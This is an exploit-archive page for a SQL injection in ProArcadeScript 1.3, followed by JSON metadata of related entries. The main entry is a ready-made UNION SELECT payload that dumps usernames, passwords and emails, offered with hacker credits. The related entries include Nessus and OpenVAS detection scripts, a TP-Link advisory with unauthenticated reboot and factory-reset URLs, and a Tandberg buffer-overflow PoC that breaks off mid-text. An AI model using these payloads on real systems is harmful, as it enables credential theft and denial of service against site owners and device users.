Search...

ProArcadeScript 1.3 (random) Remote SQL Injection Vulnerability

2008-09-18T00:00:00

ID 1337DAY-ID-3688
Type zdt
Reporter SuNHouSe2
Modified 2008-09-18T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
ProArcadeScript 1.3 (random) Remote SQL Injection Vulnerability
===============================================================


             /************************************************************************/
             /*                                                                      */
             /*                          ProArcadeScript v1.3                        */
             /*                                                                      */
             /*                   Remote SQL Injection Vulnerability                 */
             /*                                                                      */
             /*                                                                      */
             /************************************************************************/
             /                                                                        /


 [~]AUTHOR          : SuNHouSe2 [ALGERIAN HaCkEr]                  

 [~]VERSION         : Tested on &gt;&gt;&gt; ProArcadeScript v1.3

 [~]BUY SCRIPT      : http://www.proarcadescript.com  &gt;&gt;&gt; Price : 59.01 USD

 [~]EXPLOIT         : 

                     http://127.0.0.1/?random=-2 UNION SELECT 1,2,3,concat(username,char(58),password,char(58),email),5+FROM+pas_users--

                

                             /////////////////////////////////////////////////////////////////////////////////////
            
                            ////////        Special ThanX : His0k4,& ALL Snakespc.com Members       ////////////
                           ////////          &lt;&lt; GOOD RAMADANE FOR ALL MUSLIMS In THE World &gt;&gt;      ////////////

                          ////////////////////////////////////////////////////////////////////////////////////



#  0day.today [2018-03-13]  #

JSON Vulners Source

Initial Source

{"hash": "c316904b236e5175cd90d1f0179def31e50a7da3ec20c16795f78997e75745ec", "id": "1337DAY-ID-3688", "lastseen": "2018-03-13T20:30:50", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "ff13e4163db0b9cdfb566949b4d08a96", "key": "href"}, {"hash": "01482360f10e3867c110f03ea6262d79", "key": "modified"}, {"hash": "01482360f10e3867c110f03ea6262d79", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ca0d80acb43a465a78ea7290255951c2", "key": "reporter"}, {"hash": "20a423cf120b45bf51880c68de367a3d", "key": "sourceData"}, {"hash": "ce467a854239d6c3dce8c1819770dd2b", "key": "sourceHref"}, {"hash": "6afc77bb092c472decd9e35c80760989", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2018-03-13T20:30:50"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310106116"]}, {"type": "cve", "idList": ["CVE-2013-3688"]}, {"type": "zdt", "idList": ["1337DAY-ID-20886"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122007"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:10301", "SECURITYVULNS:DOC:6909", "SECURITYVULNS:VULN:3688", "SECURITYVULNS:DOC:3688"]}], "modified": "2018-03-13T20:30:50"}, "vulnersScore": 5.9}, "type": "zdt", "sourceHref": "https://0day.today/exploit/3688", "description": "Exploit for unknown platform in category web applications", "title": "ProArcadeScript 1.3 (random) Remote SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "e63f5005fa585944f2e4d7f1b8d6e005a4146401fddf3ca34b588db09c44614c", "id": "1337DAY-ID-3688", "lastseen": "2016-04-19T23:36:04", "enchantments": {"score": {"value": 8.5, "modified": "2016-04-19T23:36:04"}}, "hashmap": [{"hash": "ab3e7ce4ea6ae98d23982689fbf4c434", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "ca0d80acb43a465a78ea7290255951c2", "key": "reporter"}, {"hash": "01482360f10e3867c110f03ea6262d79", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b3b4ab4c2b28b52e625c38e31e3460e1", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "01482360f10e3867c110f03ea6262d79", "key": "modified"}, {"hash": "e56d8aefccffa3ce491214357da2b664", "key": "href"}, {"hash": "6afc77bb092c472decd9e35c80760989", "key": "title"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/3688", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "ProArcadeScript 1.3 (random) Remote SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===============================================================\r\nProArcadeScript 1.3 (random) Remote SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n /************************************************************************/\r\n /* */\r\n /* ProArcadeScript v1.3 */\r\n /* */\r\n /* Remote SQL Injection Vulnerability */\r\n /* */\r\n /* */\r\n /************************************************************************/\r\n / /\r\n\r\n\r\n [~]AUTHOR : SuNHouSe2 [ALGERIAN HaCkEr] \r\n\r\n [~]VERSION : Tested on >>> ProArcadeScript v1.3\r\n\r\n [~]BUY SCRIPT : http://www.proarcadescript.com >>> Price : 59.01 USD\r\n\r\n [~]EXPLOIT : \r\n\r\n http://127.0.0.1/?random=-2 UNION SELECT 1,2,3,concat(username,char(58),password,char(58),email),5+FROM+pas_users--\r\n\r\n \r\n\r\n /////////////////////////////////////////////////////////////////////////////////////\r\n \r\n //////// Special ThanX : His0k4,& ALL Snakespc.com Members ////////////\r\n //////// << GOOD RAMADANE FOR ALL MUSLIMS In THE World >> ////////////\r\n\r\n ////////////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2008-09-18T00:00:00", "references": [], "reporter": "SuNHouSe2", "modified": "2008-09-18T00:00:00", "href": "http://0day.today/exploit/description/3688"}, "lastseen": "2016-04-19T23:36:04", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===============================================================\r\nProArcadeScript 1.3 (random) Remote SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n /************************************************************************/\r\n /* */\r\n /* ProArcadeScript v1.3 */\r\n /* */\r\n /* Remote SQL Injection Vulnerability */\r\n /* */\r\n /* */\r\n /************************************************************************/\r\n / /\r\n\r\n\r\n [~]AUTHOR : SuNHouSe2 [ALGERIAN HaCkEr] \r\n\r\n [~]VERSION : Tested on >>> ProArcadeScript v1.3\r\n\r\n [~]BUY SCRIPT : http://www.proarcadescript.com >>> Price : 59.01 USD\r\n\r\n [~]EXPLOIT : \r\n\r\n http://127.0.0.1/?random=-2 UNION SELECT 1,2,3,concat(username,char(58),password,char(58),email),5+FROM+pas_users--\r\n\r\n \r\n\r\n /////////////////////////////////////////////////////////////////////////////////////\r\n \r\n //////// Special ThanX : His0k4,& ALL Snakespc.com Members ////////////\r\n //////// << GOOD RAMADANE FOR ALL MUSLIMS In THE World >> ////////////\r\n\r\n ////////////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n\n# 0day.today [2018-03-13] #", "published": "2008-09-18T00:00:00", "references": [], "reporter": "SuNHouSe2", "modified": "2008-09-18T00:00:00", "href": "https://0day.today/exploit/description/3688"}

{"nessus": [{"lastseen": "2019-11-01T02:07:20", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The atalk_recvmsg function in net/appletalk/ddp.c in\n the Linux kernel before 3.12.4 updates a certain length\n value without ensuring that an associated data\n structure has been initialized, which allows local\n users to obtain sensitive information from kernel\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg\n system call.(CVE-2013-7267)\n\n - fs/f2fs/segment.c in the Linux kernel allows local\n users to cause a denial of service (NULL pointer\n dereference and panic) by using a noflush_merge option\n that triggers a NULL value for a flush_cmd_control data\n structure.(CVE-2017-18241)\n\n - fs/pnode.c in the Linux kernel before 4.5.4 does not\n properly traverse a mount propagation tree in a certain\n case involving a slave mount, which allows local users\n to cause a denial of service (NULL pointer dereference\n and OOPS) via a crafted series of mount system\n calls.(CVE-2016-4581)\n\n - drivers/vhost/net.c in the Linux kernel before 3.13.10,\n when mergeable buffers are disabled, does not properly\n validate packet lengths, which allows guest OS users to\n cause a denial of service (memory corruption and host\n OS crash) or possibly gain privileges on the host OS\n via crafted packets, related to the handle_rx and\n get_rx_bufs functions.(CVE-2014-0077)\n\n - It was found that the fix for CVE-2016-9576 was\n incomplete: the Linux kernel", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1534.NASL", "href": "https://www.tenable.com/plugins/nessus/124987", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1534)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124987);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/06/27 13:33:26\");\n\n script_cve_id(\n \"CVE-2013-7267\",\n \"CVE-2014-0077\",\n \"CVE-2014-2851\",\n \"CVE-2014-3688\",\n \"CVE-2015-1333\",\n \"CVE-2015-1421\",\n \"CVE-2016-0758\",\n \"CVE-2016-10088\",\n \"CVE-2016-10723\",\n \"CVE-2016-4581\",\n \"CVE-2016-5870\",\n \"CVE-2016-6786\",\n \"CVE-2017-1000252\",\n \"CVE-2017-14954\",\n \"CVE-2017-16534\",\n \"CVE-2017-17807\",\n \"CVE-2017-18241\",\n \"CVE-2017-9211\",\n \"CVE-2018-11508\",\n \"CVE-2018-14619\"\n );\n script_bugtraq_id(\n 64739,\n 66678,\n 66779,\n 70768,\n 72356\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1534)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The atalk_recvmsg function in net/appletalk/ddp.c in\n the Linux kernel before 3.12.4 updates a certain length\n value without ensuring that an associated data\n structure has been initialized, which allows local\n users to obtain sensitive information from kernel\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg\n system call.(CVE-2013-7267)\n\n - fs/f2fs/segment.c in the Linux kernel allows local\n users to cause a denial of service (NULL pointer\n dereference and panic) by using a noflush_merge option\n that triggers a NULL value for a flush_cmd_control data\n structure.(CVE-2017-18241)\n\n - fs/pnode.c in the Linux kernel before 4.5.4 does not\n properly traverse a mount propagation tree in a certain\n case involving a slave mount, which allows local users\n to cause a denial of service (NULL pointer dereference\n and OOPS) via a crafted series of mount system\n calls.(CVE-2016-4581)\n\n - drivers/vhost/net.c in the Linux kernel before 3.13.10,\n when mergeable buffers are disabled, does not properly\n validate packet lengths, which allows guest OS users to\n cause a denial of service (memory corruption and host\n OS crash) or possibly gain privileges on the host OS\n via crafted packets, related to the handle_rx and\n get_rx_bufs functions.(CVE-2014-0077)\n\n - It was found that the fix for CVE-2016-9576 was\n incomplete: the Linux kernel's sg implementation did\n not properly restrict write operations in situations\n where the KERNEL_DS option is set. A local attacker to\n read or write to arbitrary kernel memory locations or\n cause a denial of service (use-after-free) by\n leveraging write access to a /dev/sg\n device.(CVE-2016-10088)\n\n - ** DISPUTED ** An issue was discovered in the Linux\n kernel through 4.17.2. Since the page allocator does\n not yield CPU resources to the owner of the oom_lock\n mutex, a local unprivileged user can trivially lock up\n the system forever by wasting CPU resources from the\n page allocator (e.g., via concurrent page fault events)\n when the global OOM killer is invoked. NOTE: the\n software maintainer has not accepted certain proposed\n patches, in part because of a viewpoint that 'the\n underlying problem is non-trivial to\n handle.'(CVE-2016-10723)\n\n - A flaw was found in the way the Linux kernel's ASN.1\n DER decoder processed certain certificate files with\n tags of indefinite length. A local, unprivileged user\n could use a specially crafted X.509 certificate DER\n file to crash the system or, potentially, escalate\n their privileges on the system.(CVE-2016-0758)\n\n - A flaw was found in the way the Linux kernel's Stream\n Control Transmission Protocol (SCTP) implementation\n handled the association's output queue. A remote\n attacker could send specially crafted packets that\n would cause the system to use an excessive amount of\n memory, leading to a denial of service.(CVE-2014-3688)\n\n - A use-after-free flaw was found in the way the\n ping_init_sock() function of the Linux kernel handled\n the group_info reference counter. A local, unprivileged\n user could use this flaw to crash the system or,\n potentially, escalate their privileges on the\n system.(CVE-2014-2851)\n\n - The compat_get_timex function in kernel/compat.c in the\n Linux kernel before 4.16.9 allows local users to obtain\n sensitive information from kernel memory via\n adjtimex.(CVE-2018-11508)\n\n - The cdc_parse_cdc_header() function in\n 'drivers/usb/core/message.c' in the Linux kernel,\n before 4.13.6, allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device. Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out, although we\n believe it is unlikely.(CVE-2017-16534)\n\n - A flaw was found in the crypto subsystem of the Linux\n kernel before version kernel-4.15-rc4. The 'null\n skcipher' was being dropped when each af_alg_ctx was\n freed instead of when the aead_tfm was freed. This can\n cause the null skcipher to be freed while it is still\n in use leading to a local user being able to crash the\n system or possibly escalate privileges.(CVE-2018-14619)\n\n - The crypto_skcipher_init_tfm function in\n crypto/skcipher.c in the Linux kernel through 4.11.2\n relies on a setkey function that lacks a key-size\n check, which allows local users to cause a denial of\n service (NULL pointer dereference) via a crafted\n application.(CVE-2017-9211)\n\n - kernel/events/core.c in the performance subsystem in\n the Linux kernel before 4.0 mismanages locks during\n certain migrations, which allows local users to gain\n privileges via a crafted application, aka Android\n internal bug 30955111.(CVE-2016-6786)\n\n - The KEYS subsystem in the Linux kernel omitted an\n access-control check when writing a key to the current\n task's default keyring, allowing a local user to bypass\n security checks to the keyring. This compromises the\n validity of the keyring for those who rely on\n it.(CVE-2017-17807)\n\n - A use-after-free flaw was found in the way the Linux\n kernel's SCTP implementation handled authentication key\n reference counting during INIT collisions. A remote\n attacker could use this flaw to crash the system or,\n potentially, escalate their privileges on the\n system.(CVE-2015-1421)\n\n - The waitid implementation in kernel/exit.c in the Linux\n kernel through 4.13.4 accesses rusage data structures\n in unintended cases. This can allow local users to\n obtain sensitive information and bypass the KASLR\n protection mechanism via a crafted system\n call.(CVE-2017-14954)\n\n - It was found that the Linux kernel's keyring\n implementation would leak memory when adding a key to a\n keyring via the add_key() function. A local attacker\n could use this flaw to exhaust all available memory on\n the system.(CVE-2015-1333)\n\n - The msm_ipc_router_close function in\n net/ipc_router/ipc_router_socket.c in the ipc_router\n component for the Linux kernel 3.x, as used in Qualcomm\n Innovation Center (QuIC) Android contributions for MSM\n devices and other products, allow attackers to cause a\n denial of service (NULL pointer dereference) or\n possibly have unspecified other impact by triggering\n failure of an accept system call for an AF_MSM_IPC\n socket.(CVE-2016-5870)\n\n - A reachable assertion failure flaw was found in the\n Linux kernel built with KVM virtualisation(CONFIG_KVM)\n support with Virtual Function I/O feature (CONFIG_VFIO)\n enabled. This failure could occur if a malicious guest\n device sent a virtual interrupt (guest IRQ) with a\n larger (>1024) index value.(CVE-2017-1000252)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1534\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c73d2ac\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:35:09", "bulletinFamily": "scanner", "description": "dotCMS is prone to multiple vulnerabilities.", "modified": "2018-10-25T00:00:00", "published": "2016-07-05T00:00:00", "id": "OPENVAS:1361412562310106116", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106116", "title": "dotCMS Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dotcms_mult_vuln.nasl 12096 2018-10-25 12:26:02Z asteins $\n#\n# dotCMS Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:dotcms:dotcms\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106116\");\n script_version(\"$Revision: 12096 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 14:26:02 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-05 08:55:18 +0700 (Tue, 05 Jul 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2016-2355\", \"CVE-2016-3688\", \"CVE-2016-3971\", \"CVE-2016-3972\", \"CVE-2016-4040\",\n \"CVE-2016-4803\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"dotCMS Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_dotcms_detect.nasl\");\n script_mandatory_keys(\"dotCMS/installed\");\n\n script_tag(name:\"summary\", value:\"dotCMS is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"dotCMS is prone to multiple vulnerabilities:\n\nA SQL injection attack is possible via the Content REST api if the api is set to allow for anonymous\ncontent saving (which is the shipped default). (CVE-2016-2355)\n\nA SQL injection vulnerability allows remote administrators to execute arbitrary SQL commands via the\nc0-e3 parameter to dwr/call/plaincall/UserAjax.getUsersList.dwr. (CVE-2016-3688)\n\nA cross-site scripting (XSS) vulnerability in lucene_search.jsp allows remote authenticated administrators\nto inject arbitrary web script or HTML via the query parameter to c/portal/layout. (CVE-2016-3971)\n\nA directory traversal vulnerability in the dotTailLogServlet allows remote authenticated administrators\nto read arbitrary files via a .. (dot dot) in the fileName parameter. (CVE-2016-3972)\n\nA SQL injection vulnerability in the Workflow Screen allows remote administrators to execute arbitrary\nSQL commands via the orderby parameter. (CVE-2016-4040)\n\nA CRLF injection vulnerability in the send email functionality allows remote attackers to inject arbitrary\nemail headers via CRLF sequences in the subject. (CVE-2016-4803)\");\n\n script_tag(name:\"impact\", value:\"An attacker may access sensitive information in the dotcms database.\");\n\n script_tag(name:\"affected\", value:\"Version 3.3.1 and previous versions.\");\n\n script_tag(name:\"solution\", value:\"Update to 3.3.2 or later versions.\");\n\n script_xref(name:\"URL\", value:\"http://dotcms.com/security/SI-32\");\n script_xref(name:\"URL\", value:\"http://dotcms.com/security/SI-33\");\n script_xref(name:\"URL\", value:\"http://dotcms.com/security/SI-34\");\n script_xref(name:\"URL\", value:\"http://dotcms.com/security/SI-35\");\n script_xref(name:\"URL\", value:\"http://dotcms.com/security/SI-36\");\n\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less(version: version, test_version: \"3.3.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"3.3.2\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2019-05-29T18:13:04", "bulletinFamily": "NVD", "description": "The TP-Link IP Cameras TL-SC3171, TL-SC3130, TL-SC3130G, TL-SC3171G, and possibly other models before beta firmware LM.1.6.18P12_sign6, does not properly restrict access to certain administrative functions, which allows remote attackers to (1) cause a denial of service (device reboot) via a request to cgi-bin/reboot or (2) cause a denial of service (reboot and reset to factory defaults) via a request to cgi-bin/hardfactorydefault.", "modified": "2013-10-04T16:43:00", "id": "CVE-2013-3688", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3688", "published": "2013-10-01T19:55:00", "title": "CVE-2013-3688", "type": "cve", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "zdt": [{"lastseen": "2018-04-03T21:43:09", "bulletinFamily": "exploit", "description": "TP-LINK TL-SC3171 IP cameras suffer from an authentication bypass vulnerability.", "modified": "2013-06-14T00:00:00", "published": "2013-06-14T00:00:00", "id": "1337DAY-ID-20886", "href": "https://0day.today/exploit/description/20886", "type": "zdt", "title": "TP-LINK TL-SC3171 Authentication Bypass Vulnerability", "sourceData": "1.Advisory Information\r\nTitle: TP-LINK TL-SC3171 Vulnerability\r\nDate Published: 12/06/2013\r\nDate of last updated: 12/06/2013\r\n\r\n2.Vulnerability Description\r\nThe next vulnerability has been found in this device:\r\n-CVE-2013-3688. Authentication Bypass Issues(CWE-592) and Execution with Unnecessary Privileges(CWE-250).\r\n\r\n3.Affected Products\r\n-CVE-2013-3688. The following product are affected: TP-LINK TL-SC3171\r\nIt\u2019s possible others models are affected but they were not checked.\r\n\r\n4.PoC\r\n4.1.Execute Remote Command bypassing authentication\r\nCVE-2013-3688, Execute Remote Command bypassing authentication.\r\nWe have found that is possible to reboot this kind of devices remotely. The attack vector is the following one:\r\n_____________________________________________________________________________\r\nhttp://xx.xx.xx.xx/cgi-bin/reboot\r\nhttp://xx.xx.xx.xx/cgi-bin/hardfactorydefault\r\n_____________________________________________________________________________\r\n\r\nIn the first one you will get blank page and you can\u2019t re-login until the device is reboot.\r\nIn the second one, you will get a victory message and of course, in the next login you should introduce factory settings.\r\n\r\n5.Credits\r\n-CVE-2013-3688, was discovered by Eliezer Varad\u00e9 Lopez, Javier Repiso S\u00e1nchez and Jon\u00e1s Ropero Castillo. \r\n\r\n6.Report Timeline\r\n-2013-05-31: Students team notifies the TP-Link Customer Support of the vulnerability. No reply received.\r\n-2013-06-03: Students asks for a reply. \r\n-2013-06-04: TP-Link answers saying Coresecurity reported this vulnerability before and this has been corrected in a new beta firmware version.\r\n-2013-06-04: Students answer to the vendor saying that this vulnerability is different from the Coresecurity vulnerabilities.\r\n-2013-06-05: TP-Link answers saying this vulnerability is the same as the vulnerability reported by Coresecurity.\r\n-2013-06-05: Students respond by explaining the details of the vulnerability and confirming that the vulnerability is different.\r\n-2013-06-06: TP-Link answer confirming that the vulnerability is fixed with the latest patch for the reported vulnerabilities generated by Coresecurity. The beta version is available on the website of TP-Link\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20886"}, {"lastseen": "2018-01-01T03:11:57", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category dos / poc", "modified": "2009-07-13T00:00:00", "published": "2009-07-13T00:00:00", "id": "1337DAY-ID-6909", "href": "https://0day.today/exploit/description/6909", "type": "zdt", "title": "Tandberg MXP F7.0 (USER) Remote Buffer Overflow PoC", "sourceData": "===================================================\r\nTandberg MXP F7.0 (USER) Remote Buffer Overflow PoC\r\n===================================================\r\n\r\n\r\n#########################################################################################\r\n#\t\t\t\t\t\t\t\t\t\t\t#\r\n# TANDBERG BoF v0.1 - Tandberg MXP F7.0< #\r\n# Buffer Overflow Vulnerability PoC #\r\n# By otokoyama #\r\n# #\r\n# [+] We crash the process FtpCt00 by sending a 251 char string of /x20 commonly #\r\n# known as a blank space.(very simple)\t\t\t\t\t\t#\r\n# [+] The BOF happens due to the system passing all usernames:passwords to a log file. #\r\n# #\r\n# [+] Vendor has fixed THIS in the later releases of its firmware so it is now public. #\r\n# \t\t\t\t\t\t\t\t\t\t\t#\r\n# \t\t\t #\r\n# This is a good vuln due to the system not logging the IP address of the attacker. #\r\n# To be able to tell who was causing this you would need to grab a log from the FW #\r\n# and as TANDBERG does not provide timestamps on their endpoints pre f8.0 #\r\n# you would need to have recieved a SNMP notification to TMS that the system rebooted #\r\n# and cross reference that with the IP's connecting through the firewall. \t\t#\r\n# This is particularily annoying due to the fact that systems reboot all the time\t#\r\n# As endusers are constantly turning them on\\off\t\t\t\t\t#\r\n# At this point the sysadmin goes \"TANDBERG Can we buy an Expressway?\" \t\t#\r\n#\t\t\t\t\t\t\t\t\t\t #\r\n# As far as it goes, creating a connectback shell would be difficult #\r\n# this is mainly due to the process on the Endpoint that detects a memory mismatch #\r\n# and subsequently reboots the 